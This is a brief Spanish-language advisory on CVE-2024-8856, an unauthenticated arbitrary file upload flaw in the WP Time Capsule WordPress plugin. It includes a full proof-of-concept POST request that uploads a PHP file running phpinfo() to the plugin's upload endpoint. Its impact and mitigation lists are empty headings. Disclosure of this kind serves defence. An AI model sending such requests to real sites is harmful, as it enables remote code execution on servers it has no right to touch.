
Vulnerabilidad de subida de archivos arbitraria en el complemento WP Time Capsule de WordPress
CVE-2024-8856 es una vulnerabilidad de seguridad encontrada en el plugin WP Time Capsule para WordPress que permite a usuarios no autenticados subir archivos arbitrarios al servidor. Esto puede conducir a la ejecución remota de código si los archivos subidos son ejecutados por el servidor. La vulnerabilidad surge de una validación insuficiente de archivos y puede ser explotada enviando solicitudes especialmente diseñadas al endpoint vulnerable.
Esta vulnerabilidad permite a usuarios no autenticados:
La siguiente es una prueba de concepto que demuestra cómo explotar la vulnerabilidad CVE-2024-8856 enviando una solicitud POST al endpoint vulnerable.
POST /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php HTTP/1.1
Host: wordpress.local
Content-Length: 199
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHvQu3NOpI44bLkPN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Origin: http://wordpress.local
Content-Disposition: 18.php
Accept-Encoding: gzip, deflate, br
Connection: close
------WebKitFormBoundaryHvQu3NOpI44bLkPN
Content-Disposition: form-data; name="files"; filename="php"
Content-Type: application/sql
<?php phpinfo();
------WebKitFormBoundaryHvQu3NOpI44bLkPN--
Para mitigar esta vulnerabilidad:
CVE-2024-8856 - Base Nacional de Datos de Vulnerabilidades
CVE-2024-8856 es una vulnerabilidad grave que requiere atención inmediata por parte de los administradores de sitios WordPress que utilizan el plugin WP Time Capsule. Se deben tomar las precauciones adecuadas para proteger la aplicación contra una posible explotación. Mantente siempre al día con las prácticas de seguridad y las actualizaciones del plugin.